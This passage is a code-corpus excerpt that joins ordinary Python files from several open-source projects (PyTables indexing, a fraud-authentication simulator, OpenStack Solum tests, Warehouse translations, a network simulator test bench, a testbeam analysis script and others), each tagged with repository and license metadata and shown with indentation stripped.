result1 = hi
if result2 < 0:
if item2 >= end:
result2 = hi
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Finally, do a lookup for item1 and item2 if they were not found
# Lookup in the middle of slice for item1
chunksize = self.chunksize # Number of elements/chunksize
nchunk = -1
# Try to get the bounds row from the LRU cache
nslot = boundscache.getslot(nrow)
if nslot >= 0:
# Cache hit. Use the row kept there.
bounds = boundscache.getitem(nslot)
else:
# No luck with cached data. Read the row and put it in the cache.
bounds = self._v_parent.bounds[nrow]
size = bounds.size * bounds.itemsize
boundscache.setitem(nrow, bounds, size)
if result1 < 0:
# Search the appropriate chunk in bounds cache
nchunk = bisect_left(bounds, item1)
chunk = self._read_sorted_slice(nrow, chunksize * nchunk,
chunksize * (nchunk + 1))
result1 = indexesextension._bisect_left(chunk, item1, chunksize)
result1 += chunksize * nchunk
# Lookup in the middle of slice for item2
if result2 < 0:
# Search the appropriate chunk in bounds cache
nchunk2 = bisect_right(bounds, item2)
if nchunk2 != nchunk:
chunk = self._read_sorted_slice(nrow, chunksize * nchunk2,
chunksize * (nchunk2 + 1))
result2 = indexesextension._bisect_right(chunk, item2, chunksize)
result2 += chunksize * nchunk2
return (result1, result2)
def __str__(self):
"""A compact representation of this class"""
return f"IndexArray(path={self._v_pathname})"
def __repr__(self):
"""A verbose representation of this class."""
return f"""{self}
atom = {self.atom!r}
shape = {self.shape}
nrows = {self.nrows}
chunksize = {self.chunksize}
slicesize = {self.slicesize}
byteorder = {self.byteorder!r}"""
| avalentino/PyTables | tables/indexes.py | Python | bsd-3-clause | 5,884 | 0 |
from authenticators.simple_authenticators import RandomAuthenticator, \
HeuristicAuthenticator, OracleAuthenticator, NeverSecondAuthenticator, \
AlwaysSecondAuthenticator
from simulator import parameters
from simulator.transaction_model import TransactionModel
from experiments import rewards
import numpy as np
import matplotlib.pyplot as plt
from experiments import result_handling
def run_single():
# get the parameters for the simulation
params = parameters.get_default_parameters()
params['init_satisfaction'] = 0.9
# increase the probability of making another transaction
new_stay_prob = [0.8, 0.5]
print('changing stay prob from', params['stay_prob'], 'to', new_stay_prob)
params['stay_prob'] = new_stay_prob
plt.figure(figsize=(10, 5))
for a in ['random', 'oracle', 'never_second', 'heuristic', 'always_second']:
# the authenticator
authenticator = get_authenticator(a)
# initialise transaction model
model = TransactionModel(params, authenticator)
# run the simulation until termination
while not model.terminated:
model.step()
# get the collected data
agent_vars = model.log_collector.get_agent_vars_dataframe()
agent_vars.index = agent_vars.index.droplevel(1)
model_vars = model.log_collector.get_model_vars_dataframe()
# save the results
result_handling.save_results(model)
reward_fraud = rewards.money_lost_per_timestep(agent_vars)
reward_genuine = rewards.money_made_per_timestep(agent_vars)
monetary_rewards = rewards.monetary_reward_per_timestep(agent_vars)
true_satisfactions = rewards.satisfaction_per_timestep(model_vars)
# plt.subplot(1, 4, 1)
plt.ylabel('revenue (total)')
plt.plot(range(len(monetary_rewards)), np.cumsum(monetary_rewards), label=a)
plt.legend()
# plt.subplot(1, 4, 2)
# plt.ylabel('cumulative satisfaction')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 3)
# plt.ylabel('revenue (money lost by fraud)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 4)
# plt.ylabel('revenue (money gained by genuine transactions)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
plt.tight_layout()
plt.show()
def get_authenticator(auth_type):
if auth_type == 'random':
return RandomAuthenticator()
elif auth_type == 'heuristic':
return HeuristicAuthenticator(50)
elif auth_type == 'oracle':
return OracleAuthenticator()
elif auth_type == 'never_second':
return NeverSecondAuthenticator()
elif auth_type == 'always_second':
return AlwaysSecondAuthenticator()
if __name__ == '__main__':
run_single()
| lmzintgraf/MultiMAuS | experiments/run_multimaus.py | Python | mit | 2,970 | 0.001684 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from solum.api import auth
from solum.api.handlers import workflow_handler
from solum.openstack.common.fixture import config
from solum.tests import base
from solum.tests import fakes
from solum.tests import utils
@mock.patch('solum.objects.registry')
class TestWorkflowHandler(base.BaseTestCase):
def setUp(self):
super(TestWorkflowHandler, self).setUp()
self.ctx = utils.dummy_context()
self.CONF = self.useFixture(config.Config())
self.CONF.config(auth_uri='http://fakeidentity.com',
group=auth.OPT_GROUP_NAME)
self.CONF.config(keystone_version='3')
def test_workflow_get(self, mock_registry):
mock_registry.return_value.Workflow.get_by_uuid.return_value = {
'app_id': '1234'
}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get('test_id')
self.assertIsNotNone(res)
get_by_uuid = mock_registry.Workflow.get_by_uuid
get_by_uuid.assert_called_once_with(self.ctx, 'test_id')
def test_workflow_get_all(self, mock_reg):
mock_reg.WorkflowList.get_all.return_value = {}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get_all(app_id='123')
self.assertIsNotNone(res)
mock_reg.WorkflowList.get_all.assert_called_once_with(self.ctx,
app_id='123')
def test_delete(self, mock_registry):
db_obj = fakes.FakeWorkflow()
mock_registry.Workflow.get_by_uuid.return_value = db_obj
handler = workflow_handler.WorkflowHandler(self.ctx)
handler.delete('test_id')
mock_registry.Workflow.get_by_uuid.assert_called_once_with(self.ctx,
'test_id')
@mock.patch('solum.worker.api.API.build_app')
@mock.patch('solum.objects.sqlalchemy.workflow.Workflow.insert')
def test_create(self, mock_wf_insert, mock_pa, mock_registry):
app_obj = fakes.FakeApp()
app_id = app_obj.id
test_cmd = app_obj.workflow_config['test_cmd']
run_cmd = app_obj.workflow_config['run_cmd']
mock_registry.App.get_by_id.return_value = app_obj
workflow_data = {"actions": ["unittest", "build", "deploy"],
"app_id": app_id,
"source": app_obj.source,
"config": app_obj.workflow_config,
"actions": app_obj.trigger_actions}
fp = fakes.FakePlan()
mock_registry.Plan.return_value = fp
fa = fakes.FakeAssembly()
fa.plan_uuid = fp.uuid
mock_registry.Assembly.return_value = fa
wf_obj = fakes.FakeWorkflow()
wf_obj.app_id = app_obj.id
wf_obj.assembly = fa.id
mock_registry.Workflow.return_value = wf_obj
fi = fakes.FakeImage()
mock_registry.Image.return_value = fi
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.create(workflow_data, commit_sha='', status_url='',
du_id='')
self.assertEqual(wf_obj, res)
git_info = {
'source_url': app_obj.source['repository'],
'commit_sha': app_obj.source['revision'],
'repo_token': '',
'status_url': None,
}
mock_pa.assert_called_once_with(
verb='launch_workflow', workflow=['unittest', 'build', 'deploy'],
build_id=fa.id, name=fi.name, assembly_id=fa.id,
git_info=git_info, test_cmd=test_cmd, ports=app_obj.ports,
base_image_id=fi.base_image_id,
source_format=fi.source_format,
image_format=fi.image_format, run_cmd=run_cmd, du_id='') | devdattakulkarni/test-solum | solum/tests/api/handlers/test_workflow.py | Python | apache-2.0 | 4,365 | 0.000229 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for fedjax."""
import unittest
import fedjax
class FedjaxTest(unittest.TestCase):
"""Test fedjax can be imported correctly."""
def test_import(self):
self.assertTrue(hasattr(fedjax, 'FederatedAlgorithm'))
self.assertTrue(hasattr(fedjax.aggregators, 'Aggregator'))
self.assertTrue(hasattr(fedjax.algorithms, 'fed_avg'))
self.assertTrue(hasattr(fedjax.datasets, 'emnist'))
self.assertTrue(hasattr(fedjax.models, 'emnist'))
self.assertTrue(hasattr(fedjax.training, 'save_checkpoint'))
def test_no_core(self):
self.assertFalse(hasattr(fedjax, 'core'))
if __name__ == '__main__':
unittest.main()
| google/fedjax | fedjax/fedjax_test.py | Python | apache-2.0 | 1,219 | 0.003281 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import functools
from jinja2 import contextfunction
from pyramid.threadlocal import get_current_request
class TranslationString:
def __init__(self, message_id, plural=None, n=None, mapping=None):
if mapping is None:
mapping = {}
self.message_id = message_id
self.plural = plural
self.n = n
self.mapping = mapping
if bool(self.plural) != bool(self.n):
raise ValueError("Must specify plural and n together.")
def __repr__(self):
extra = ""
if self.plural is not None:
extra = " plural={!r} n={!r}".format(self.plural, self.n)
return "<TranslationString: message_id={!r}{}>".format(
self.message_id,
extra,
)
def __mod__(self, mapping):
if not isinstance(mapping, collections.abc.Mapping):
raise TypeError("Only mappings are supported.")
vals = self.mapping.copy()
vals.update(mapping)
return TranslationString(
self.message_id, self.plural, self.n, mapping=vals,
)
def translate(self, translation):
if self.plural is not None:
result = translation.ngettext(self.message_id, self.plural, self.n)
else:
result = translation.gettext(self.message_id)
return result % self.mapping
class JinjaRequestTranslation:
def __init__(self, domain):
self.domain = domain
@contextfunction
def gettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.gettext(*args, **kwargs)
@contextfunction
def ngettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.ngettext(*args, **kwargs)
@contextfunction
def translate_value(ctx, value):
if isinstance(value, TranslationString):
return value.translate(ctx["request"].translation)
return value
def gettext(message_id, **kwargs):
return TranslationString(message_id, mapping=kwargs)
def ngettext(message_id, plural, n=None, **kwargs):
if n is None:
return functools.partial(
TranslationString, message_id, plural, mapping=kwargs
)
return TranslationString(message_id, plural, n, mapping=kwargs)
| chopmann/warehouse | warehouse/i18n/translations.py | Python | apache-2.0 | 2,912 | 0 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cvirtual.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| Serchcode/cvirtual | manage.py | Python | gpl-3.0 | 806 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-15 16:12
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=2000, verbose_name='Имя студента')),
('rating', models.IntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)], verbose_name='Рейтинг')),
],
),
]
| Alt90/Student_progress_bar | achievement/migrations/0001_initial.py | Python | mit | 819 | 0.003745 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from fairu import __version__
def packages():
packages = []
for root, dirnames, filenames in os.walk('fairu'):
if '__init__.py' in filenames:
packages.append(".".join(os.path.split(root)).strip("."))
return packages
def description():
return open('README.md', 'r').read()
def requirements():
lines = open('REQUIREMENTS', 'r').readlines()
requirements = []
for line in lines:
requirements.append(line.replace('\n', ''))
return requirements
def entry_points():
ENTRY_POINTS = {}
try:
from setuptools import Command
except ImportError:
sys.stderr.write("setuptools.Command could not be imported: setuptools "
"extensions not available")
else:
command_hook = "distutils.commands"
ENTRY_POINTS[command_hook] = []
from commands import coverage_analysis
if coverage_analysis.COVERAGE_ANALYSIS_AVAILABLE:
ENTRY_POINTS[command_hook].append("test = commands.coverage_ana"
"lysis:CoverageAnalysis")
return ENTRY_POINTS
def get_setup_config():
from ConfigParser import ConfigParser
config = ConfigParser()
config.read('setup.cfg')
def get_setup_config():
return config
return config
if __name__ == '__main__':
setup(name = 'fairu',
version = __version__,
description = "Fairu is a python library to handle files easily "
"using a chain pattern like the jQuery framework.",
author = 'Diego Fleury',
author_email = 'dfleury@gmail.com',
license = 'GPL',
keywords = "files batch process handling",
url = 'http://github.com/dfleury/fairu',
packages = packages(),
long_description = description(),
entry_points = entry_points(),
classifiers = ["Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers"
"License :: OSI Approved :: GNU General Public "
"License (GPL)"
"Programming Language :: Python :: 2",
"Topic :: Software Development :: Libraries :: "
"Python Modules"],
install_requires = requirements()
) | dfleury/fairu | setup.py | Python | gpl-3.0 | 2,511 | 0.018319 |
from seabreeze.pyseabreeze.features._base import SeaBreezeFeature
# Definition
# ==========
#
# TODO: This feature needs to be implemented for pyseabreeze
#
class SeaBreezeDataBufferFeature(SeaBreezeFeature):
identifier = "data_buffer"
def clear(self) -> None:
raise NotImplementedError("implement in derived class")
def remove_oldest_spectra(self, number_of_spectra: int) -> None:
raise NotImplementedError("implement in derived class")
def get_number_of_elements(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity(self) -> int:
raise NotImplementedError("implement in derived class")
def set_buffer_capacity(self, capacity: int) -> None:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_maximum(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_minimum(self) -> int:
raise NotImplementedError("implement in derived class")
| ap--/python-seabreeze | src/seabreeze/pyseabreeze/features/databuffer.py | Python | mit | 1,040 | 0 |
# Working Unit Test Benches for Network Simulator
# Last Revised: 14 November 2015 by Sushant Sundaresh & Sith Domrongkitchaiporn
'''
IMPORTANT: Please turn off logging (MEASUREMENT_ENABLE = False) in constants.py
before running these testbenches.
'''
# Unit Testing Framework
import unittest
# Test Modules
import reporter, node, host, link, router
import flow, event_simulator, event, events
import link, link_buffer, packet
import constants
from static_flow_test_node import *
import visualize
class testMeasurementAnalysis (unittest.TestCase):
'''
Tests visualize.py time-averaging function
'''
def test_time_averaging (self):
self.assertTrue(visualize.test_windowed_time_average())
class TestStaticDataSinkFlow (unittest.TestCase):
'''
### Might break for dynamic TCP ###
if this is implemented on receiver side as well
Create Flow Data Sink
Create Static_Data_Sink_Test_Node
Tell Flow its number or expected packets
Create Event Simulator
For now:
Ask flow to receive a packet, check that Ack has same packet ID
Ask flow to receive the same packet again, should get same result.
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Sink("f1sink","h2","h1",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Sink_Test_Node ("h2","f1sink")
self.sim = event_simulator.Event_Simulator({"f1sink":self.f,"h2":self.n})
self.f.set_flow_size(2)
def test_basic_ack (self):
packets = [ packet.Packet("f1source","h1","h2","",0,0), \
packet.Packet("f1source","h1","h2","",1,0)]
self.n.receive(packets[0])
self.assertEqual(self.n.head_of_tx_buff(),0)
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
# Two packets received, two packets acknowledged
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
# Repeated packets just get repeated acks
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestStaticDataSourceFlow (unittest.TestCase):
'''
### Will break for dynamic TCP ###
Assumes Flow (Data Source) Window Size
hard-coded to 2
Create Flow Data Source
Create Static_Data_Source_Test_Node
Create Event Simulator
Start Flow -> pokes tcp -> sends two packets to Node
Check that these were sent to Node
Fake Acks through Node to Flow
Check that this updates Node Tx_Buffer (more sends from Flow)
Check what Timeout Does
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Source("f1","h1","h2",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Source_Test_Node ("h1","f1")
self.sim = event_simulator.Event_Simulator({"f1":self.f,"h1":self.n})
def test_static_flow_source (self):
# The first static flow source implementation
# just has packets/acks have the same id.
# There is no chance of 'duplicate acks' to indicate loss
self.f.start() # do this manually so don't have to run simulator
self.assertEqual(self.n.head_of_tx_buff(),0)
packet1 = self.n.tx_buff[0]
self.assertEqual(self.n.head_of_tx_buff(),1)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.n.receive(packet.Packet("","h2","h1",\
constants.DATA_PACKET_ACKNOWLEDGEMENT_TYPE,\
0,constants.DATA_ACK_BITWIDTH))
self.assertEqual(self.n.head_of_tx_buff(),2)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.f.time_out(packet1)
# check that next packet has id 1
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestLinkTransmissionEvents(unittest.TestCase):
sim = "" # simulator
link = "" # link
lNode = "" # left node
rNode = "" # right node
lPs = [] # left packets
rPs = [] # right packets
# Create Event Simulator
# Create Link & Nodes (not Hosts, so don't need working Flow) on either side
# Create three packets from either side, to the other, and send them.
def setUp (self):
self.lNode = node.Node("h1")
self.rNode = node.Node("h2")
# don't need flow, as no packet timeouts created to callback to flow
# and node receive is a dummy function
for i in 1, 2, 3:
self.lPs.append(packet.Packet("","h1","h2","data",i,1000)) # 1000kbit
self.rPs.append(packet.Packet("","h2","h1","data",i,1000))
self.link = link.Link("l1", "h1", "h2", 1000.0, 10.0, 3000.0)
# 1000kbit/ms, 10 ms prop delay, 3000kbit buffers
self.sim = event_simulator.Event_Simulator({"l1":self.link, \
"h1":self.lNode, \
"h2":self.rNode})
# Order the packet sends 2L-2R-L-R
# Run Sim Forward
# Watch for transmission events in EventSimulator, with proper timestamp
# Watch for propagation events in EventSimulator, with proper timestamp
# Make sure these are sequential, with only one Tx event at a time in
# the queue, and two propagations in each direction chained, and one isolated.
# Note this tests most events we're trying to deal with.
def test_packet_callbacks_and_timing (self):
self.link.send(self.rPs.pop(0),"h2") # right going packets
# are favored in time tie breaks
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.lPs.pop(0),"h1")
# all have timestamp 0.0
# so link should switch directions
# between each packet
# Confirm Handle_Packet_Transmission events show up in EventSim
# with proper timestamps
self.assertTrue(self.sim.get_current_time() == 0)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 1)
# right packet1 load
# into channel at
# 1ms going h2->h1
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 11)
# propagation done
# direction switched
# next packet loaded
# LTR
self.assertTrue(self.link.transmission_direction == constants.LTR)
# next event is a load (12)
# then a propagation (22)
# then
# the next event should be
# both remaining h2 packets
# loaded, as left buffer
# is empty
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 12)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 22)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.sim.run_next_event() # two loads
self.assertTrue(self.sim.get_current_time() == 24)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event() # two propagations
self.sim.run_next_event()
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.assertTrue(self.sim.get_current_time() == 34)
class TestLinkBuffer(unittest.TestCase):
# test variables
l = "" # a link buffer
p = "" # a packet exactly half the size of the buffer
s = "" # event simulator
def setUp (self):
c = 100 # buffer capacity in bits
self.s = event_simulator.Event_Simulator({})
self.l = link_buffer.LinkBuffer(c)
self.l.set_event_simulator(self.s)
self.p = packet.Packet("","","","","",c/2)
def test_enqueue_dequeue (self):
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertFalse(self.l.can_enqueue(self.p))
self.l.enqueue(self.p) # dropped
self.l.enqueue(self.p) # dropped
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertFalse(self.l.can_dequeue())
with self.assertRaises(ValueError):
self.l.dequeue()
class TestReporter(unittest.TestCase):
# Set ID of reporter
def test_get_id(self):
ID = "H1"
r = reporter.Reporter(ID)
r.log("Hello World!")
self.assertEqual(r.get_id(), ID)
class TestNode(unittest.TestCase):
# Set ID of node through super initialiation
def test_init(self):
ID = "H2"
n = node.Node(ID)
n.log("Hello World!")
self.assertEqual(n.get_id(), ID)
# Should not break, as receive is a dummy function
def test_receive(self):
ID = "H2"
n = node.Node(ID)
n.receive(0)
class TestEventSimulator(unittest.TestCase):
def test_init_and_basic_simulation (self):
e = event_simulator.Event_Simulator({"h1":host.Host("h1",["l1"]),\
"h2":host.Host("h2",["l1"]),\
"f1":flow.Data_Source("f1", "h1", "h2", 20, 1)})
self.assertEqual(e.get_current_time(), 0.0)
self.assertFalse(e.are_flows_done())
self.assertEqual(e.get_element("h1").get_id(), "h1")
self.assertEqual(e.get_element("h2").get_id(), "h2")
self.assertEqual(e.get_element("f1").get_id(), "f1")
e.request_event(event.Event().set_completion_time(1.0))
e.request_event(event.Event().set_completion_time(2.0))
e.request_event(event.Event().set_completion_time(0.5))
e.request_event(event.Event().set_completion_time(1.5))
e.request_event(event.Event().set_completion_time(0.2))
''' Now event heap should be ordered 0.2, 0.5, 1, 1.5, 2 '''
e.run_next_event()
self.assertEqual(e.get_current_time(), 0.2)
e.run_next_event()
self.assertEqual(e.get_current_time(), 0.5)
e.run_next_event()
self.assertEqual(e.get_current_time(), 1.0)
e.run_next_event()
self.assertEqual(e.get_current_time(), 1.5)
e.run_next_event()
self.assertEqual(e.get_current_time(), 2.0)
class TestHost(unittest.TestCase):
# Set ID of host through super initialiation
def test_init(self):
ID = "H1"
Links = ["L1"]
h = host.Host(ID,Links)
h.log("Hello World!")
self.assertEqual(h.get_id(), ID)
with self.assertRaises(ValueError):
h2 = host.Host(ID,["L1","L2"])
class TestLink(unittest.TestCase):
ID = ""
left = ""
right = ""
rate = ""
delay = ""
buff = ""
l = ""
def setUp(self):
self.ID = "L1"
self.left = "H1"
self.right = "H2"
self.rate = "10"
self.delay = "10"
self.buff = "64"
self.l = link.Link(self.ID,self.left,self.right,self.rate,self.delay,self.buff)
# Set ID of link through super initialiation
def test_get_id(self):
self.assertEqual(self.l.get_id(), self.ID)
def test_get_left(self):
self.assertEqual(self.l.get_left(),self.left)
def test_get_right(self):
self.assertEqual(self.l.get_right(),self.right)
def test_get_rate(self):
self.assertEqual(self.l.get_rate(),float(self.rate))
def test_get_delay(self):
self.assertEqual(self.l.get_delay(),float(self.delay))
def test_get_buff(self):
self.assertEqual(self.l.get_buff(),float(self.buff) * 8.0) # bytes to bits
class TestRouter(unittest.TestCase):
# Set ID of link through super initialiation
def test_init(self):
ID = "R1"
links = ["H1","H2","H3"]
r = router.Router(ID,links)
self.assertEqual(r.get_id(), ID)
self.assertEqual(r.get_link(),links)
class TestFlow(unittest.TestCase):
# Set ID of link through super initialiation
def test_init(self):
ID = "F1"
source = "H1"
dest = "H2"
size = "20"
start = "1"
f = flow.Flow(ID,source,dest,size,start)
self.assertEqual(f.get_id(), ID)
self.assertEqual(f.get_source(), source)
self.assertEqual(f.get_dest(), dest)
self.assertEqual(f.get_size(), int(size) * 8.0 * 1000.0) # MByte -> KBit
self.assertEqual(f.get_start(), int(start) * 1000) # s to ms
# Run Specific Tests
if __name__ == "__main__":
reporter_suite = unittest.TestLoader().loadTestsFromTestCase(TestReporter)
node_suite = unittest.TestLoader().loadTestsFromTestCase(TestNode)
host_suite = unittest.TestLoader().loadTestsFromTestCase(TestHost)
link_suite = unittest.TestLoader().loadTestsFromTestCase(TestLink)
router_suite = unittest.TestLoader().loadTestsFromTestCase(TestRouter)
flow_suite = unittest.TestLoader().loadTestsFromTestCase(TestFlow)
sim_suite = unittest.TestLoader().loadTestsFromTestCase(TestEventSimulator)
linkbuffer_suite = unittest.TestLoader().loadTestsFromTestCase(TestLinkBuffer)
link_tx_suite = unittest.TestLoader().loadTestsFromTestCase(TestLinkTransmissionEvents)
static_flow_data_source_suite = \
unittest.TestLoader().loadTestsFromTestCase(TestStaticDataSourceFlow)
static_flow_data_sink_suite = \
unittest.TestLoader().loadTestsFromTestCase(TestStaticDataSinkFlow)
visualize_suite = \
unittest.TestLoader().loadTestsFromTestCase(testMeasurementAnalysis)
test_suites = [reporter_suite, node_suite, host_suite, link_suite,\
router_suite, flow_suite, sim_suite, linkbuffer_suite,\
link_tx_suite,static_flow_data_source_suite,\
static_flow_data_sink_suite, visualize_suite]
for suite in test_suites:
unittest.TextTestRunner(verbosity=2).run(suite)
print "\n\n\n" | sssundar/NetworkSimulator | Code/Python/unit_test_benches.py | Python | gpl-2.0 | 12,927 | 0.044403 |
''' Example script to run a full analysis on telescope data. The original data
can be found in the example folder of the EUTelescope framework.
Data in https://github.com/eutelescope/eutelescope/tree/v1.0-tag/jobsub/examples/datura-150mm-DAF
The residuals are calculated with different cuts on prealigned and aligned data
for demonstration purpose:
- When only prealigning the DUTs and using all DUT hits and cutting on the chi2:
The residuals are very dependent if the prealignment is sufficient. Residuals
are usually rather high (several 10 um)
- When aligning the DUTs and only interpolating the tracks from 2 DUTs:
The residual for the planes 2 - 4 (DUT 1 - DUT 3) are about 6.5 um in x/y and
comparable to the residuals from the EuTelescope software (6 um).
- When aligning the DUTs and using all DUT hits and cutting on the chi2:
The residuals and selected number of tracks are highly dependent on the
chi2 cut and are at least 6 um and usually < 10 um depending on the
plane position. This is an effect of multiple scattering. The outer most plans
have a rather high residual (~ 18 um)
- When using a Kalman Filter for track builing instead of an interpolation
which takes no correlations between the measurements into account, the
residuals can be improved by ~ 30 percent for the inner planes.
Setup
-----
The telescope consists of 6 planes with 15 cm clearance between the planes.
The data was taken at Desy with ~ 5 GeV/c (Run number 36).
The Mimosa26 has an active area of 21.2mm x 10.6mm and the pixel matrix
consists of 1152 columns and 576 rows (18.4um x 18.4um pixel size).
The total size of the chip is 21.5mm x 13.7mm x 0.036mm
(radiation length 9.3660734)
The matrix is divided into 4 areas. For each area the threshold can be set up
individually. The quartes are from column 0-287, 288-575, 576-863 and 864-1151.
The Mimosa26 detects ionizing particle with a density of up to
10^6 hits / cm^2 / s. The hit rate for a beam telescope is ~5 hits / frame.
'''
import os
import inspect
import logging
from testbeam_analysis import (hit_analysis, dut_alignment, track_analysis,
result_analysis)
from testbeam_analysis.tools import analysis_utils
logging.basicConfig(
level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s]\
(%(threadName)-10s) %(message)s")
def run_analysis(data_files):
# Pixel dimesions and matrix size of the DUTs
pixel_size = [(18.4, 18.4)] * 6 # Column, row pixel pitch in um
n_pixels = [(1152, 576)] * 6 # Number of pixel on column, row
z_positions = [0., 150000, 300000, 450000, 600000, 750000] # z position in um
# Friendly names for plotting
dut_names = ("Tel_0", "Tel_1", "Tel_2", "Tel_3", "Tel_4", "Tel_5")
# Create output subfolder where all output data and plots are stored
output_folder = os.path.join(os.path.split(data_files[0])[0],
'output_eutel')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# The following shows a complete test beam analysis by calling the
# seperate function in correct order
# Generate noisy pixel mask for all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.generate_pixel_mask(input_hits_file=data_file,
n_pixel=n_pixels[i],
pixel_mask_name='NoisyPixelMask',
pixel_size=pixel_size[i],
threshold=0.5,
dut_name=dut_names[i])
# Cluster hits from all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.cluster_hits(input_hits_file=data_file,
input_noisy_pixel_mask_file=os.path.splitext(data_files[i])[0] + '_noisy_pixel_mask.h5',
min_hit_charge=0,
max_hit_charge=1,
column_cluster_distance=3,
row_cluster_distance=3,
frame_cluster_distance=1,
dut_name=dut_names[i])
# Generate filenames for cluster data
input_cluster_files = [os.path.splitext(data_file)[0] + '_clustered.h5'
for data_file in data_files]
# Correlate the row / column of each DUT
dut_alignment.correlate_cluster(input_cluster_files=input_cluster_files,
output_correlation_file=os.path.join(
output_folder, 'Correlation.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
dut_names=dut_names)
# Create prealignment relative to the first DUT from the correlation data
input_correlation_file = os.path.join(output_folder, 'Correlation.h5')
dut_alignment.prealignment(input_correlation_file=input_correlation_file,
output_alignment_file=os.path.join(
output_folder, 'Alignment.h5'),
z_positions=z_positions,
pixel_size=pixel_size,
dut_names=dut_names,
# This data has several tracks per event and
# noisy pixel, thus fit existing background
fit_background=True,
# Tries to find cuts automatically;
# deactivate to do this manualy
non_interactive=True)
# Merge the cluster tables to one merged table aligned at the event number
dut_alignment.merge_cluster_data(input_cluster_files=input_cluster_files,
output_merged_file=os.path.join(
output_folder, 'Merged.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the prealignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
force_prealignment=True)
